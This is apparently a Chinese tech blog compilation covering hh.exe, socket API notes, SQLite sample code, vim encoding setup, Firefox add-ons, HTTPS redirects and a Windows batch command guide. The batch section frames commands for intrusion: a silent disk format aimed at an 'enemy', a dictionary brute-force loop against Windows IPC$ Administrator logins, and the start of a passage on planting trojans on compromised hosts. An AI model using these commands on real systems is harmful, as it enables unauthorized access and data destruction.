hh.exe参数

hh.exe参数

题注:hh.exe是一个命令下打开chm文件的小程序。但是某天在csdn发现了某网友帖出的–hh.exe隐藏参数云云……嘿嘿……就像当年发现copy 1+2>3一样令人着迷,其实呢,hh.exe很普通。
在cmd下输入: hh /? 发现屏幕没有任何反应,这是怎么回事?然后又输入:hh ntcmds.chm–在命令行帮助文档中也没发现hh.exe的踪影。那么它什么工具呢,为什么有它的存在,却没有它的说明?
于是去microsoft查找了一番,原来它是HTML Help Workshop命令行工具。那么什么是HTML Help Workshop,嘿嘿,告诉你吧–系统内所有编译的帮助文档(chm)都是出自它手。
看看它的参数:

hh.exe
-800
将Help viewer设为800*600

-title
将chm以窗口800*600显示

-register

tcptrace

官方网站:http://www.tcptrace.org/

简介:

tcptrace is a tool written by Shawn Ostermann at Ohio University, for analysis of TCP dump files. It can take as input the files produced by several popular packet-capture programs, including tcpdump, snoop, etherpeek, HP Net Metrix, and WinDump. tcptrace can produce several different types of output containing information on each connection seen, such as elapsed time, bytes and segments sent and recieved, retransmissions, round trip times, window advertisements, throughput, and more. It can also produce a number of graphs for further analysis.

Elementary TCP socket

Elementary TCP socket

摘自:《Unix Network Programming, Volumn 3》chapter 4.
# include <sys/socket.h>
int socket (int family, int type, int protocol);
Family:协议族(AF_INET, AF_INET6, AF_LOCAL, AF_ROUTE, AF_KEY等)当前linux可支持更多协议族。
AF_KEY:支持加密保护的数据安全
type:协议类型(SOCK_STREAM, SOCK_DGRAM, SOCK_RAW)
protocol:大多数情况下为0,除了raw sockets
AF_UNIX区别于AF_LOCAL??????
Linux支持SOCK_PACKET类型,用于操作2层数据包(datalink)。packet(7)显示,不推荐使用
AF_ 在大多数系统中等同于 PF_
# include <sys/socket.h>
int connect(int sockfd, const struct sockaddr_in *addr, socketlen_t len);
Connect 主要执行tcp的3次握手(to be established),在发出ACK报文后,connect()就返回了。在此之前,不需要客户端执行bind,内核将自动为其指定ip及port
Connect的错误返回值:
1. 服务器不响应(主叫方发出SYN后,75s内无响应)ETIMEOUT
2. 服务器返回RST(服务器的被动端口未打开hard error)ECONNREFUSED
3. 中间路由器响应目标不可达(soft error),也必须等待75s,期间内核继续发送SYN包。EHOSTUNREACH ENETUNREACH

注意:如果connect返回错误,则该sockfd将不再可用,如需再次申请建立连接,必须:close(sockfd); socket(sockfd2); connect(sockfd2);
# include <sys/socket.h>
int bind(int sockfd, const struct sockaddr *myaddr, socklen_t addrlen);
绑定(bind)用于指定本地sockaddr到套接口
服务器通常需要使用bind来绑定特定的port来监听用户的连接申请。例外:
RPC通过使用端口映射(PORT MAP)来查询所用的RPC端口。
如果服务器未使用bind绑定ip,则使用客户端的目的ip填充到sockaddr。也就是说,在客户端连接到服务器之前,sockaddr的值是未确定的。客户端的本地套接口地址是由路由表决定的
port=0
htonl(INADDR_ANY)
注意:posix.1g规定,sockaddr的sin_port和sin_addr必须是以网络字节顺序表示,虽然INADDR_ANY在大多数情况下为0,但从规范上讲,应该使用上面的例子
在<netinet/in.h>中定义的常数”INADDR_xxx”都是主机顺序,应使用htonl()进行转换
在bind()执行完成后,本机的sockaddr必须通过getsockname()获得,bind()本身并不返回该值
# include <sys/socket.h>
int listen(int sockfd, int backlog);做两件事:
1. 将无连接的sockfd转为被动套接口(passive socket),内核将能接受指向sockfd的连接请求。
2. 将该套接口的连接队列置为backlog
内核为每个监听套接口维护2个队列:incomplete和complete
incomplete队列是指,没有完成3次握手的队列。
只有在accept()调用返回后,一个处于complete queue的entry才被清除。而且在此之前所获得的有效数据已保存在TCP接收缓存中
一般系统对backlog的值都有上限,backlog不要设为0(各个系统的实现不一致)。
linux的backlog可以设置为0,表示不限制连接数。但是这含有bug
Linux下的backlog默认为1024
传统上,backlog表示2个队列的和;
linux2.2以后,backlog设为完成队列的值,未完成队列的值由内核管理,通过tcp_max_sys_backlog (sysctl)指定。(这是为了放置网络上的syn攻击塞满早期的整个backlog)

# include <sys/socket.h>
int accept(int sockfd, struct sockaddr *cliaddr, socklen_t * addrlen);
返回客户端sockaddr
一般listened socket存在于整个服务器进程中,connected socket 存在于每个子进程。
只有超级用户才有权限绑定1-1024口。
fork()后子进程继承父进程sockfd,子进程exec后,如果FD_CLOEXEC为0(默认),则sockfd不会关闭。可以用fcntl()修改。
在子进程exec后,唯一获得sockaddr的函数是getsockname(), getpeername()
iterative server
concurrent server
调用close(sockfd)后: (counter == 0) ? shutdown(sockfd) : (counter-1)
常用并行服务器模型:
Socket();
Bind();
Listen();
While (1) {
Accept();
Pid=Fork();
If (pid==0) { //child process
Close(listenfd);
Do sth;
Close(connfd);
}
If (pid>0) { //parent process
Close(connfd);
}
}
注意:以上的父进程如果省略close(connfd),后果:
1. 父进程的套接口描述符将越来越大,直到OPEN_MAX
2. 子进程并没有发送FIN,连接依然存在。父进程的连接数一直增大到backlog后,不再接受任何连接
close()进行的操作:(如果counter为0)

1.关闭socket的读、写端
2.发送send buffer中的数据,并且发送FIN
3.并且不会等待对端返回ACK而直接返回。(见p188,figure7.6)
可以通过使用shutdown(),SO_LINGER参数来更改。具体区别见p191,figure7.10
# include <sys/socket.h>
int getsockname(int sockfd, struct sockaddr *addr, socklen_t *addlen); //返回本地sockaddr
int getpeername(int sockfd, struct sockaddr *addr, socklen_t *addlen); //返回对端sockaddr
由上可以猜想:sockfd所关联的结构中,必然包括本地sockaddr和对端sockaddr。

关于文件数据库

文件数据库
文件数据库又叫嵌入式数据库,将整个数据库的内容保存在单个索引文件中,以便于数据库的发布。
文件数据库的3个重要特征(相对于传统数据库)
1. 数据操作接口
SQL92标准,不管是传统数据库,还是文件数据库,都必须支持SQL92标准。
2. 数据保存格式
传统数据库(DB2, Oracle, SQL server等)数据保存的方式各异。
文件数据库将数据保存在单一文件中。
3. API支持
传统数据库都支持ODBCJDBC
某些文件数据库不支持ODBCJDBCsqlite都不支持,Berkeley DBODBCJDBC支持,Firdbird有第三方的ODBC驱动)。
 
 
文件数据库与传统数据库的比较
优势: 由于数据保存在单一文件中,数据库的部署和发布都比较简单,适用于内嵌在应用程序中。
            数据量不是太大时,速度比传统数据库要快。
缺点: 由于数据保存在单一文件中,数据库打开时,该文件会被整个load到内存,应此数据库不能过大(100M以内,个人测试)。
 
各种文件数据库的比较
Sqlite:  老牌的文件数据库,完全免费 ( public domain ),使用方便,无须任何配置,下载源代码编译成库或者直接编译到应用程序都可以(250K,C代码)。支持事务机制和blob数据类型。http://www.sqlite.org/
Berkerley DB: 更老牌的文件数据库,最稳定的数据库,完全可以取代大部分传统client/server数据库的应用场合;支持xml(代价是30M硬盘空间)。缺点是配置和使用比较复杂,不太适合小项目。
Firbird:与sqlite比较类似,有C#支持。某些发布版本不能build, 很久没有关注了。
Access:一般不考虑
 
Sqlite简单介绍
个人比较喜欢sqlite, 使用最方便,唯一的准备工作是下载250K的源;而且作者很热心,有问必答。
以下演示一下使用sqlite的步骤,先创建一个数据库,然后查询其中的内容。2个重要结构体和5个主要函数:
sqlite3               *pdb, 数据库句柄,跟文件句柄FILE很类似
sqlite3_stmt      *stmt, 这个相当于ODBCCommand对象,用于保存编译好的SQL语句
 
sqlite3_open(),   打开数据库
sqlite3_exec(),   执行非查询的sql语句
sqlite3_prepare(), 准备sql语句,执行select语句或者要使用parameter bind时,用这个函数(封装了sqlite3_exec.
Sqlite3_step(), 在调用sqlite3_prepare后,使用这个函数在记录集中移动。
Sqlite3_close(), 关闭数据库文件
 
还有一系列的函数,用于从记录集字段中获取数据,如
sqlite3_column_text(), text类型的数据。
sqlite3_column_blob(),取blob类型的数据
sqlite3_column_int(), int类型的数据
 
实例代码如下,
附件工程可直接编译,例子使用了blob数据类型。
#include "sqlite3.h"                                //包含一个头文件就可以使用所以sqlite的接口了
#include "stdlib.h"
#include "stdio.h"
#include "string.h"
 
#pragma comment(lib, "sqlite.lib")           //我把sqlite编译成了一个静态的lib文件。
 
void       createdb();
void       querydb();
 
int         main()
{
            createdb();
            querydb();
 
            return 0;
}
 
void       createdb()
{
            int                     ret;
            sqlite3               *pdb = 0;
            sqlite3_stmt      *stmt = 0;
            char                  *error = 0;
            char                  *sql = "insert into table1 values(‘value11’,:aaa)";
            int                     index;
            static void          *value = "asdfadsfasdfjasdfjaksdfaskjdfakdsfaksfja";
 
            ret = sqlite3_open("db1.sdb", &pdb);                    //打开数据库,跟打开文本文件一样
            if( ret != SQLITE_OK )
                        return;
            ret = sqlite3_exec(pdb, "create table table1(col1 char(20), col2 BLOB)", 0,0, &error );
            if( ret != SQLITE_OK )
                        return;
 
            ret = sqlite3_prepare(pdb, sql,strlen(sql), &stmt, &error);
            if( ret != SQLITE_OK )
                        return;
 
            index = sqlite3_bind_parameter_index(stmt, ":aaa");
 
            ret = sqlite3_bind_blob(stmt, index, value, strlen(value), SQLITE_STATIC);
            if( ret != SQLITE_OK )
                        return;
 
            ret = sqlite3_step(stmt);
           
            if( ret != SQLITE_DONE )
                        return;
 
            sqlite3_close(pdb);        
}
 
void       querydb()
{
            int                     ret;
            sqlite3   *pdb = 0;
            sqlite3_stmt      *pstmt = 0;
            char      *error = 0;
            char      *sql = "select * from table1";
            int                     len;
            int                     i;
            char      *name;
            void       *value;
 
            ret = sqlite3_open("db1.sdb", &pdb);
            if( ret != SQLITE_OK )
                        return;
 
            ret = sqlite3_prepare(pdb, sql, strlen(sql), &pstmt, &error);
            if( ret != SQLITE_OK )
                        return;
 
            while( 1 )
            {
                        ret = sqlite3_step(pstmt);
                        if( ret != SQLITE_ROW )
                                    break;
 
                        name = sqlite3_column_text(pstmt, 0);
                        value = sqlite3_column_blob(pstmt, 1);
                        len = sqlite3_column_bytes(pstmt,1 );
            }
}

vim 编码设置

vim,编辑器之王。

一般的,vim打开中文文件时会出现乱码,原因比较复杂,不罗嗦了。直接讲解决办法

set fileencoding=gb18030
set fileencodings=utf-8,gb18030,utf-16,big5

想看这样设置的原因吗?请继续。下文在网络中广泛流传

vim里面的编码主要跟三个参数有关:enc(encoding), fenc(fileencoding)和fencs(fileencodings)

其中fenc是当前文件的编码,也就是说,一个在vim里面已经正确显示了的文件(前提是你的系统环境跟你的enc设置匹配),你可以通过改变 fenc后再w来将此文件存成不同的编码。比如说,我:set fenc=utf-8然后:w就把文件存成utf-8的了,:set fenc=gb18030再:w就把文件存成gb18030的了。这个值对于打开文件的时候是否能够正确地解码没有任何关系。

fencs就是用来在打开文件的时候进行解码的猜测列表。文件编码没有百分百正确的判断方法,所以vim只能猜测文件编码。比如我的vimrc里面这个的设置是

set fileencodings=utf-8,gb18030,utf-16,big5

所以我的vim每打开一个文件,先尝试用utf-8进行解码,如果用utf-8解码到了一半出错(所谓出错的意思是某个地方无法用utf-8正确地解码),那么就从头来用gb18030重新尝试解码,如果gb18030又出错(注意gb18030并不是像utf-8似的规则编码,所以所谓的出错只是说某个编码没有对应的有意义的字,比如0),就尝试用utf-16,仍然出错就尝试用big5。这一趟下来,如果中间的某次解码从头到尾都没有出错,那么 vim就认为这个文件是这个编码的,不会再进行后面的尝试了。这个时候,fenc的值就会被设为vim最后采用的编码值,可以用:set fenc?来查看具体是什么。

当然这个也是有可能出错的,比如你的文件是gb18030编码的,但是实际上只有一两个字符是中文,那么有可能他们正好也能被utf-8解码,那么这个文件就会被误认为是utf-8的导致错误解码。

至于enc,其作用基本只是显示。不管最后的文件是什么编码的,vim都会将其转换为当前系统编码来进行处理,这样才能在当前系统里面正确地显示出来,因此enc就是干这个的。在windows下面,enc默认是cp936,这也就是中文windows的默认编码,所以enc是不需要改的。在 linux下,随着你的系统locale可能设为zh_CN.gb18030或者zh_CN.utf-8,你的enc要对应的设为gb18030或者 utf-8(或者gbk之类的)。

最后再来说一下新建空文件的默认编码。看文档好像说会采用fencs里面的第一个编码作为新建文件的默认编码。但是这里有一个问题,就是fencs 的顺序跟解码成功率有很大关系,根据我的经验utf-8在前比gb18030在前成功率要高一些,那么如果我新建文件默认想让它是gb18030编码怎么办?一个方法是每次新建文件后都:set fenc=gb18030一下,不过我发现在vimrc里面设置fenc=gb18030也能达到这个效果。

另外,在ubuntu中文论坛还有人提出了这样的办法,直接就配置了

所有代码直接粘贴到终端运行即可!
安装程序
代码:
sudo apt-get install vim-gtk vim-doc cscope

创建启动项
代码:

cat > /usr/share/applications/gvim.desktop << "EOF"
[Desktop Entry]
Name=Gvim
Comment[zh_CN]=Gvim编辑器
Exec=gvim
Icon=/usr/share/pixmaps/gnome-word.png
Terminal=false
X-MultipleArgs=false
Type=Application
Categories=Application;Development;
Encoding=UTF-8
StartupNotify=true
EOF

locale为zh_CN.utf8的配置文件
代码:

cat > $HOME/.vimrc << "EOF"
"===========================================================================
" 项目: gvim 配置文件
" 作者: yonsan [QQ:82555472]
" 安装: sudo apt-get install vim-gtk
" 用法: 将本文件(.vimrc)拷贝到$HOME/
"===========================================================================

" 使用 murphy 调色板
colo murphy
" 设置用于GUI图形用户界面的字体列表。
set guifont=SimSun 10
"
set nocompatible
" 设定文件浏览器目录为当前目录
set bsdir=buffer
set autochdir
" 设置编码
set enc=utf-8
" 设置文件编码
set fenc=utf-8
" 设置文件编码检测类型及支持格式
set fencs=utf-8,ucs-bom,gb18030,gbk,gb2312,cp936
" 指定菜单语言
set langmenu=zh_CN.UTF-8
source $VIMRUNTIME/delmenu.vim
source $VIMRUNTIME/menu.vim
" 设置语法高亮度
set syn=cpp
"显示行号
set nu!
" 查找结果高亮度显示
set hlsearch
" tab宽度
set tabstop=4
set cindent shiftwidth=4
set autoindent shiftwidth=4
" C/C++注释
set comments=://
" 修正自动C式样注释功能 <2005/07/16>
set comments=s1:/*,mb:*,ex0:/
" 增强检索功能
set tags=./tags,./../tags,./**/tags
" 保存文件格式
set fileformats=unix,dos
" 键盘操作
map gk
map gj
" 命令行高度
set cmdheight=1
" 使用cscope
if has("cscope")
set csprg=/usr/bin/cscope
set csto=0
set cst
set nocsverb
" add any database in current directory
if filereadable("cscope.out")
cs add cscope.out
" else add database pointed to by environment
elseif $CSCOPE_DB != ""
cs add $CSCOPE_DB
endif
set csverb
endi
" 中文帮助
if version > 603
set helplang=cn
endi
EOF

locale为zh_CN.gbk的配置文件
代码:

cat > $HOME/.vimrc << "EOF"
"===========================================================================
" 项目: gvim 配置文件
" 作者: yonsan [QQ:82555472]
" 安装: sudo apt-get install vim-gtk
" 用法: 将本文件(.vimrc)拷贝到$HOME/
"===========================================================================

" 使用 murphy 调色板
colo murphy
" 设置用于GUI图形用户界面的字体列表。
set guifont=SimSun 10
"
set nocompatible
" 设定文件浏览器目录为当前目录
set bsdir=buffer
set autochdir
" 设置编码
set enc=chinese
" 设置文件编码
set fenc=chinese
" 设置文件编码检测类型及支持格式
set fencs=gbk,utf-8,ucs-bom,gb18030,gb2312,cp936
" 指定菜单语言
set langmenu=zh_CN.GBK
source $VIMRUNTIME/delmenu.vim
source $VIMRUNTIME/menu.vim
" 设置语法高亮度
set syn=cpp
"显示行号
set nu!
" 查找结果高亮度显示
set hlsearch
" tab宽度
set tabstop=4
set cindent shiftwidth=4
set autoindent shiftwidth=4
" C/C++注释
set comments=://
" 修正自动C式样注释功能 <2005/07/16>
set comments=s1:/*,mb:*,ex0:/
" 增强检索功能
set tags=./tags,./../tags,./**/tags
" 保存文件格式
set fileformats=unix,dos
" 键盘操作
map gk
map gj
" 命令行高度
set cmdheight=1
" 使用cscope
if has("cscope")
set csprg=/usr/bin/cscope
set csto=0
set cst
set nocsverb
" add any database in current directory
if filereadable("cscope.out")
cs add cscope.out
" else add database pointed to by environment
elseif $CSCOPE_DB != ""
cs add $CSCOPE_DB
endif
set csverb
endi
" 中文帮助
if version > 603
set helplang=cn
endi
EOF

30个为网页设计者和开发人员精选的Firefox扩展插件

摘自:http://stylizedweb.com/2008/02/07/30-best-firefox-add-ons/

Dejan Cancarevic是一名优秀的网页设计者和开发人员,下面他精选了30个他经常使用的Firefox插件,这些插件都能很好的帮助网页设计者和开发人员,简化工作量,或是增加设计应用功能等等。

1. CSSMate – 在线的CSS编辑器扩展插件

2. ViewSourceWith – 让你查看页面资源的Firefox扩展应用

3. PicLens – 变换你的浏览器为一个三维的浏览环境来查看网页图片的Firefox扩展插件

4. FireShot -强大的网页截图/截屏插件

5. SeoQuake – 搜索引擎优化和网站推广插件

6. Font Finder -简单的高亮一个事件并且左键点击弹出菜单可以查看CSS样式

7. Live HTTP Headers – 在浏览网页的同时查看一个页面的HTTP头部信息

8. Modify Headers – 允许你添加、修改或过滤http头部请求信息的Firefox扩展插件

9. CSSViewer -一个简单实用的扩张,可以让你查看当前网页中任何部分的CSS代码

10. EditCSS – 只需要右键点击就可以在浏览器的侧边栏中查看和编辑样式表代码

11. Firebug – 查看,编辑和跟踪 网页上面的CSS, HTML和Javascript的Firefox插件

12. View Formatted Source -为网页上的每一个元素格式化并使用不同的颜色高亮显示

13. Professor X -让你不看源代码就能看到页面头部信息的Firefox插件

14. CSS validator – 一键检查当前网页是否符合W3C CSS 标准的验证器插件

15. Validaty -提供给你一个类似于validator.w3.org的校验器按钮

16. Html Validator – 添加HTML校验器

17. Copy as HTML Link -给选中的文本创建一个当前页面的HTML链接

18. TableTools – 过滤、排序 HTML表格等的Firefox扩展插件

19. CHM Reader – 让Firefox支持HTML编译文件的Firefox扩展插件

20. PageDiff – 帮助网页设计者和开发人员在不同的网页之前查看页面源代码

21. Clipmarks – 让你保存当前页面中的任何元素的Firefox插件

22. SourceEditor – 查看和编辑HTML元素代码的Firefox扩展插件

23. Total Validator -使用官方DTDs提供一个真正的HTML检查器的Firefox扩展插件

24. LinkChecker – 检查任何网页上面的有效链接的Firefox扩展插件

25. Web Developer – 添加一个菜单和工具栏,包含各种网页开发工具的Firefox扩展插件

26. Style Sheet Chooser II – 让你选择网站作者为网站提供的候补风格的Firefox扩展插件

27. View Dependencies -显示网页上面所有被装载的元素信息的Firefox扩展插件

28. Accessibar – 可以轻松地操纵网页显示和文本语音输出的Firefox扩展插件

29. Aardvark – 用来清楚网页的冗余信息和打印网页等功能的Firefox扩展插件

30. JSview – 添加能够查看外部档案源代码的功能

 

 

关于https的提示问题

这里说明两个问题:

1. https的页面里“包含”http的内容,将会被提示

注意:这里的“包含”是这么理解的,是指打开该https页面时读取到http的内容,如: src属性 ,flash object的codebase属性等,不要以为a标签的href属性指向了http的链接就是不安全的,因为在该https页面他只是显示,没有读取里面的内容,所以不是不安全元素。

2. https到http跳转时的提示

其实,从https到http跳转有多种方式,而且一般来讲,只要不将安全页面里的内容扔给不安全页面或不在安全页面里读取不安全页面的内容都是没有问题的,显然,在安全页面里的一个form要提交到不安全页面是违反原则的,一般要提示;另外,浏览器的选项里一般可以设置,从https到http的简单的跳转也可以设置成提示的;
下面给出几种跳转方式:

$url "http://phpor.net/target.php"
switch(
$_GET["t"]) { 
    case 
"h"
        
header("Location: $url"); 
        break; 
    case 
"m"
        echo 
"<meta http-equiv=’refresh’ content=’2; url=$url’>"
        break; 
    case 
"l"
        echo 
"<script>location.href=’$url’;</script>"
        break; 
    case 
"f"
        echo 
"<form id=’f’ action=’$url’ ></form>"
        echo 
"<script>window.onload= function () {document.getElementById(‘f’).submit();}</script>"
        break; 
    case 
"l2"
        echo 
"<script>location.href=’$url’;</script>"
        break; 
    default: 
        echo 
"<a href=’?t=h’>header redirect</a><br />"
        echo 
"<a href=’?t=m’>meta redirect</a><br />"
        echo 
"<a href=’?t=l’>location.href redirect</a><br />"
        echo 
"<a href=’?t=f’>form redirect</a><br />"
        echo 
"<a href=’?t=l2′>location.replace redirect</a><br />"
        echo 
"<br /><br />"
        echo 
"结论:只有使用form的action的方式在firfox下跳转有提示,在ie7下也没有提示,其他几种跳转方式在ie7和firfox下都没有提示"
        echo 
"<br>firfox 提示:虽然此页已被加密,但您输入的信息将通过未加密的连接来发送,极容易被第三方看到。您确定要继续发送此消息吗?"
        echo 
"<br /><br />"
        echo 
"由此看来,提示不是源于跳转,而是读取不安全的数据,没有在安全的页面里读不安全的数据将不会被提示的"
        break; 
}

批处理命令大全

1.Echo 命令
打开回显或关闭请求回显功能,或显示消息。如果没有任何参数,echo 命令将显示当前回显设置。
语法
echo [{on|off}] [message]
Sample:echo off / echo hello world
在实际应用中我们会把这条命令和重定向符号(也称为管道符号,一般用> >> ^)结合来实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。

2.@ 命令
表示不显示@后面的命令,在入侵过程中(例如使用批处理来格式化敌人的硬盘)自然不能让对方看到你使用的命令啦。
Sample:@echo off
@echo Now initializing the program,please wait a minite…
@format X: /q/u/autoset (format 这个命令是不可以使用/y这个参数的,可喜的是微软留了个autoset这个参数给我们,效果和/y是一样的。)

3.Goto 命令
指定跳转到标签,找到标签后,程序将处理从下一行开始的命令。
语法:goto label (label是参数,指定所要转向的批处理程序中的行。)
Sample:
if {%1}=={} goto noparms
if {%2}=={} goto noparms(如果这里的if、%1、%2你不明白的话,先跳过去,后面会有详细的解释。)
@Rem check parameters if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end
标签的名字可以随便起,但是最好是有意义的字母啦,字母前加个:用来表示这个字母是标签,goto命令就是根据这个:来寻找下一步跳到到那里。最好有一些说明这样你别人看起来才会理解你的意图啊。

4.Rem 命令
注释命令,在C语言中相当与/*——–*/,它并不会被执行,只是起一个注释的作用,便于别人阅读和你自己日后修改。
Rem Message
Sample:@Rem Here is the description.

5.Pause 命令
运行 Pause 命令时,将显示下面的消息:
Press any key to continue . . .
Sample:
@echo off
:begin
copy a:*.* d:\back
echo Please put a new disk into driver A
pause
goto begin
在这个例子中,驱动器 A 中磁盘上的所有文件均复制到d:\back中。显示的注释提示您将另一张磁盘放入驱动器 A 时,pause 命令会使程序挂起,以便您更换磁盘,然后按任意键继续处理。

6.Call 命令
从一个批处理程序调用另一个批处理程序,并且不终止父批处理程序。call 命令接受用作调用目标的标签。如果在脚本或批处理文件外使用 Call,它将不会在命令行起作用。
语法
call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]
参数
[Drive:}[Path] FileName
指定要调用的批处理程序的位置和名称。filename 参数必须具有 .bat 或 .cmd 扩展名。

7.start 命令
调用外部程序,所有的DOS命令和命令行程序都可以由start命令来调用。
入侵常用参数:
MIN 开始时窗口最小化
SEPARATE 在分开的空间内开始 16 位 Windows 程序
HIGH 在 HIGH 优先级类别开始应用程序
REALTIME 在 REALTIME 优先级类别开始应用程序
WAIT 启动应用程序并等候它结束
parameters 这些为传送到命令/程序的参数
执行的应用程序是 32-位 GUI 应用程序时,CMD.EXE 不等应用程序终止就返回命令提示。如果在命令脚本内执行,该新行为则不会发生。
8.choice 命令
choice 使用此命令可以让用户输入一个字符,从而运行不同的命令。使用时应该加/c:参数,c:后应写提示可输入的字符,之间无空格。它的返回码为1234……

如: choice /c:dme defrag,mem,end
将显示
defrag,mem,end[D,M,E]?
Sample:
Sample.bat的内容如下:
@echo off
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag (应先判断数值最高的错误码)
if errorlevel 2 goto mem
if errotlevel 1 goto end

:defrag
c:\dos\defrag
goto end
:mem
mem
goto end
:end
echo good bye

此文件运行后,将显示 defrag,mem,end[D,M,E]? 用户可选择d m e ,然后if语句将作出判断,d表示执行标号为defrag的程序段,m表示执行标号为mem的程序段,e表示执行标号为end的程序段,每个程序段最后都以goto end将程序跳到end标号处,然后程序将显示good bye,文件结束。

9.If 命令

if 表示将判断是否符合规定的条件,从而决定执行不同的命令。 有三种格式:
1、if "参数" == "字符串" 待执行的命令
参数如果等于指定的字符串,则条件成立,运行命令,否则运行下一句。(注意是两个等号)
如if "%1"=="a" format a:
if {%1}=={} goto noparms
if {%2}=={} goto noparms

2、if exist 文件名 待执行的命令
如果有指定的文件,则条件成立,运行命令,否则运行下一句。
如if exist config.sys edit config.sys

3、if errorlevel / if not errorlevel 数字 待执行的命令
如果返回码等于指定的数字,则条件成立,运行命令,否则运行下一句。
如if errorlevel 2 goto x2
DOS程序运行时都会返回一个数字给DOS,称为错误码errorlevel或称返回码,常见的返回码为0、1。

10.for 命令
for 命令是一个比较复杂的命令,主要用于参数在指定的范围内循环执行命令。
在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable

for {%variable|%%variable} in (set) do command [ CommandLineOptions]
%variable 指定一个单一字母可替换的参数。
(set) 指定一个或一组文件。可以使用通配符。
command 指定对每个文件执行的命令。
command-parameters 为特定命令指定参数或命令行开关。
在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable
而不要用 %variable。变量名称是区分大小写的,所以 %i 不同于 %I

如果命令扩展名被启用,下列额外的 FOR 命令格式会受到
支持:

FOR /D %variable IN (set) DO command [command-parameters]

如果集中包含通配符,则指定与目录名匹配,而不与文件
名匹配。

FOR /R [[drive:]path] %variable IN (set) DO command [command-

检查以 [drive:]path 为根的目录树,指向每个目录中的
FOR 语句。如果在 /R 后没有指定目录,则使用当前
目录。如果集仅为一个单点(.)字符,则枚举该目录树。

FOR /L %variable IN (start,step,end) DO command [command-para

该集表示以增量形式从开始到结束的一个数字序列。
因此,(1,1,5) 将产生序列 1 2 3 4 5,(5,-1,1) 将产生
序列 (5 4 3 2 1)。

FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN (command) DO command

或者,如果有 usebackq 选项:

FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN (command) DO command

filenameset 为一个或多个文件名。继续到 filenameset 中的
下一个文件之前,每份文件都已被打开、读取并经过处理。
处理包括读取文件,将其分成一行行的文字,然后将每行
解析成零或更多的符号。然后用已找到的符号字符串变量值
调用 For 循环。以默认方式,/F 通过每个文件的每一行中分开
的第一个空白符号。跳过空白行。您可通过指定可选 "options"
参数替代默认解析操作。这个带引号的字符串包括一个或多个
指定不同解析选项的关键字。这些关键字为:

eol=c – 指一个行注释字符的结尾(就一个)
skip=n – 指在文件开始时忽略的行数。
delims=xxx – 指分隔符集。这个替换了空格和跳格键的
默认分隔符集。
tokens=x,y,m-n – 指每行的哪一个符号被传递到每个迭代
的 for 本身。这会导致额外变量名称的
格式为一个范围。通过 nth 符号指定 m
符号字符串中的最后一个字符星号,
那么额外的变量将在最后一个符号解析之
分配并接受行的保留文本。
usebackq – 指定新语法已在下类情况中使用:
在作为命令执行一个后引号的字符串并且
引号字符为文字字符串命令并允许在 fi
中使用双引号扩起文件名称。

sample1:
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command

会分析 myfile.txt 中的每一行,忽略以分号打头的那些行,将
每行中的第二个和第三个符号传递给 for 程序体;用逗号和/或
空格定界符号。请注意,这个 for 程序体的语句引用 %i 来
取得第二个符号,引用 %j 来取得第三个符号,引用 %k
来取得第三个符号后的所有剩余符号。对于带有空格的文件
名,您需要用双引号将文件名括起来。为了用这种方式来使
用双引号,您还需要使用 usebackq 选项,否则,双引号会
被理解成是用作定义某个要分析的字符串的。

%i 专门在 for 语句中得到说明,%j 和 %k 是通过
tokens= 选项专门得到说明的。您可以通过 tokens= 一行
指定最多 26 个符号,只要不试图说明一个高于字母 z 或
Z 的变量。请记住,FOR 变量是单一字母、分大小写和全局的;
同时不能有 52 个以上都在使用中。

您还可以在相邻字符串上使用 FOR /F 分析逻辑;方法是,
用单引号将括号之间的 filenameset 括起来。这样,该字符
串会被当作一个文件中的一个单一输入行。

最后,您可以用 FOR /F 命令来分析命令的输出。方法是,将
括号之间的 filenameset 变成一个反括字符串。该字符串会
被当作命令行,传递到一个子 CMD.EXE,其输出会被抓进
内存,并被当作文件分析。因此,以下例子:

FOR /F "usebackq delims==" %i IN (set) DO @echo %i

会枚举当前环境中的环境变量名称。

另外,FOR 变量参照的替换已被增强。您现在可以使用下列
选项语法:

~I – 删除任何引号("),扩充 %I
%~fI – 将 %I 扩充到一个完全合格的路径名
%~dI – 仅将 %I 扩充到一个驱动器号
%~pI – 仅将 %I 扩充到一个路径
%~nI – 仅将 %I 扩充到一个文件名
%~xI – 仅将 %I 扩充到一个文件扩展名
%~sI – 扩充的路径只含有短名
%~aI – 将 %I 扩充到文件的文件属性
%~tI – 将 %I 扩充到文件的日期/时间
%~zI – 将 %I 扩充到文件的大小
%~$PATH:I – 查找列在路径环境变量的目录,并将 %I 扩充
到找到的第一个完全合格的名称。如果环境变量
未被定义,或者没有找到文件,此组合键会扩充
空字符串

可以组合修饰符来得到多重结果:

%~dpI – 仅将 %I 扩充到一个驱动器号和路径
%~nxI – 仅将 %I 扩充到一个文件名和扩展名
%~fsI – 仅将 %I 扩充到一个带有短名的完整路径名
%~dp$PATH:i – 查找列在路径环境变量的目录,并将 %I 扩充
到找到的第一个驱动器号和路径。
%~ftzaI – 将 %I 扩充到类似输出线路的 DIR

在以上例子中,%I 和 PATH 可用其他有效数值代替。%~ 语法
用一个有效的 FOR 变量名终止。选取类似 %I 的大写变量名
比较易读,而且避免与不分大小写的组合键混淆。

以上是MS的官方帮助,下面我们举几个例子来具体说明一下For命令在入侵中的用途。

sample2:

利用For命令来实现对一台目标Win2k主机的暴力密码破解。
我们用net use \\ip\ipc$ "password" /u:"administrator"来尝试这和目标主机进行连接,当成功时记下密码。
最主要的命令是一条:for /f i% in (dict.txt) do net use \\ip\ipc$ "i%" /u:"administrator"
用i%来表示admin的密码,在dict.txt中这个取i%的值用net use 命令来连接。然后将程序运行结果传递给find命令--
for /f i%% in (dict.txt) do net use \\ip\ipc$ "i%%" /u:"administrator"|find ":命令成功完成">>D:\ok.txt ,这样就ko了。

sample3:

你有没有过手里有大量肉鸡等着你去种后门+木马呢?,当数量特别多的时候,原本很开心的一件事都会变得很郁闷:)。文章开头就谈到使用批处理文件,可以简化日常或重复性任务。那么如何实现呢?呵呵,看下去你就会明白了。

